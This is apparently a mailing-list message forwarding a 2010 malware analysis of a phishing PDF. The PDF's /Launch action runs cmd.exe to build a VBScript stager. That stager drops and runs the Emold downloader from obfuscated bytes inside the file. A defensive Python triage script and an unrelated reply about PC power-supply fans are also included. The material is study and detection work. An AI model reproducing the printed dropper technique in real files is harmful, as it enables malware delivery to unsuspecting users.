http://www.secureworks.com/research/blog/index.php/2010/04/27/your-malware-setting-may-have-changed/
Last night and this morning a number of people received an email that looked like this:

    From: [email protected] [mailto:[email protected]]
    Sent: Tuesday, April 27, 2010 7:47 AM
    To: [email protected]
    Subject: setting for your mailbox are changed

    SMTP and POP3 servers for [email protected] mailbox are changed. Please carefully read the attached instructions before updating settings.

It contained a file called "doc.pdf". That file was, of course, malicious in nature. It used the PDF Launch vulnerability to echo some commands into a bat file and then bootstrap itself into running the Emold downloader trojan. Let's take a look.

    8 0 obj
    << /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True) >> script.vbs && echo pf=f.ReadAll >> script.vbs && echo s=InStr(pf,"'SS") >> script.vbs && echo e=InStr(pf,"'EE") >> script.vbs && echo s=Mid(pf,s,e-s) >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True) >> script.vbs && echo s = Replace(s,"%","") >> script.vbs && echo z.Write(s) >> script.vbs && script.vbs && batscript.vbs) >> >>

This uses cmd.exe to write some lines of text to a file called script.vbs and then executes script.vbs and batscript.vbs. Let's look at how script.vbs ends up (each "echo" above contributes one line):

    Set fso=CreateObject("Scripting.FileSystemObject")
    Set f=fso.OpenTextFile("doc.pdf", 1, True)
    pf=f.ReadAll
    s=InStr(pf,"'SS")
    e=InStr(pf,"'EE")
    s=Mid(pf,s,e-s)
    Set z=fso.OpenTextFile("batscript.vbs", 2, True)
    s = Replace(s,"%","")
    z.Write(s)

When script.vbs runs, it opens doc.pdf and looks for the tags 'SS and 'EE, which mark the beginning and end of a section of the PDF. It grabs that section, strips every "%" character from it, and writes the result to batscript.vbs.
Next let's look at what's in that tagged section of doc.pdf (which ends up as batscript.vbs):

    5 0 obj
    << /Length 46 >>
    stream
    BT /F1 34 Tf 50 500 Td (Important Information doc.pdf)Tj
    %'SS
    %Dim b
    %Function c(d)
    %c=chr(d)
    %End Function
    %b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
    c(004),c(000),c(000)...
    ...this line is 248413 characters long...
    ...c(000),c(000),c(000),c(000 ),"")
    %Set fso = CreateObject("Scripting.FileSystemObject")
    %Set f = fso.OpenTextFile("game.exe", 2, True)
    %For i = 0 To 35328
    %f.write(b(i))
    %Next
    %f.close()
    %Set WshShell = WScript.CreateObject("WScript.Shell")
    %WshShell.Run "cmd.exe /c game.exe"
    %WScript.Sleep 3000
    %Set f = FSO.GetFile("game.exe")
    %f.Delete
    %Set f = FSO.GetFile("batscript.vbs")
    %f.Delete
    %Set f = FSO.GetFile("script.vbs")
    %f.Delete
    %'EE
    endstream

Because the whole block sits on lines beginning with "%", it is a comment as far as the PDF is concerned; only after script.vbs strips the "%" characters does it become valid VBScript. We can now see that the array stored in b is actually an obfuscated executable file (the first two elements, chr(077) and chr(090), are the "MZ" header of a Windows executable), which the script writes out byte by byte to game.exe. After running game.exe, this script (executed as batscript.vbs) cleans up after itself by deleting game.exe, batscript.vbs, and script.vbs.

Game.exe is the Emold trojan. This is a generic downloader which can be used to install any number of second-stage trojans. It can be identified by the presence of the file C:/Program Files/Microsoft Common/svchost.exe, the registry key "software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe", and because it phones home to (currently) jademason.com.

Adobe has said that the Launch functionality is a feature, not a bug. Adobe is looking into the issue, but has not said what action, if any, they intend to take to mitigate the danger. Their post on the matter does include directions for turning off this functionality.

This entry was posted on Tuesday, April 27th, 2010 at 6:24 pm.
Edward Ziots
CISSP, MCSA, MCP+I, Security+, Network+, CCA
Network Engineer
Lifespan Organization
401-639-3505
[email protected]

From: Ralph Smith [mailto:[email protected]]
Sent: Wednesday, April 28, 2010 2:38 PM
To: NT System Admin Issues
Subject: RE: Low-profile desktop Ethernet adapters

We have about 35 GX520 Small Form Factor computers here. Out of those we have had 2 motherboards replaced, but the biggest problem has been the fan in the power supply - I think we are up to about a dozen of them gone bad so far. Since they are all out of warranty now, we're just replacing the fans as they go bad.
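The staged extraction described in the quoted SecureWorks write-up above (a /Launch action that invokes cmd.exe, and an executable hidden in %-commented lines between 'SS and 'EE markers) lends itself to a small triage check. The following Python is an added example, not code from the SecureWorks post or from anyone in this thread: it flags /Launch targets, carves the marker-delimited block the way script.vbs does, decodes the c(NNN) array, and reports whether the result begins with "MZ". The SAMPLE_PDF fragment is constructed for the example and is not the real doc.pdf; the regexes and function names are the example's own.

```python
import re
from typing import Optional

# Constructed stand-in for doc.pdf (NOT the real sample): a /Launch action that
# runs cmd.exe, plus a %-commented VBS block between 'SS and 'EE markers.
SAMPLE_PDF = b"""%PDF-1.4
8 0 obj
<< /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c echo x > s.vbs && s.vbs) >> >>
5 0 obj
<< /Length 46 >>
stream
BT /F1 34 Tf 50 500 Td (Important Information doc.pdf)Tj
%'SS
%Dim b
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000 ),"")
%Set f = fso.OpenTextFile("game.exe", 2, True)
%'EE
endstream
"""

LAUNCH_RE = re.compile(rb"/S\s*/Launch\b.*?/F\s*\((?P<target>[^)]*)\)", re.S)
MARKER_RE = re.compile(rb"^%'SS(?P<body>.*?)^%'EE", re.S | re.M)
CHR_RE = re.compile(rb"c\(\s*(\d{1,3})\s*\)")

def find_launch_targets(pdf: bytes) -> list:
    """Return the /F target of every /Launch action found in the file."""
    return [m.group("target").decode("latin-1") for m in LAUNCH_RE.finditer(pdf)]

def carve_marked_block(pdf: bytes) -> Optional[bytes]:
    """Mimic script.vbs: take the text between the 'SS and 'EE marker lines and
    drop every '%' character, which yields what batscript.vbs would contain."""
    m = MARKER_RE.search(pdf)
    return m.group("body").replace(b"%", b"") if m else None

def decode_chr_array(vbs: bytes) -> bytes:
    """Rebuild the byte sequence encoded as c(NNN) calls inside Array(...)."""
    return bytes(int(n) for n in CHR_RE.findall(vbs))

def triage(pdf: bytes) -> dict:
    targets = find_launch_targets(pdf)
    block = carve_marked_block(pdf)
    payload = decode_chr_array(block) if block else b""
    return {
        "launch_targets": targets,
        "launches_shell": any("cmd.exe" in t.lower() for t in targets),
        "has_marked_block": block is not None,
        "payload_bytes": len(payload),
        "payload_is_mz": payload[:2] == b"MZ",  # chr(077) chr(090) == "MZ"
    }
```

On the real file the decoded payload would be the 35329 bytes written to game.exe, so the payload length is worth recording alongside the MZ check when building a detection.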
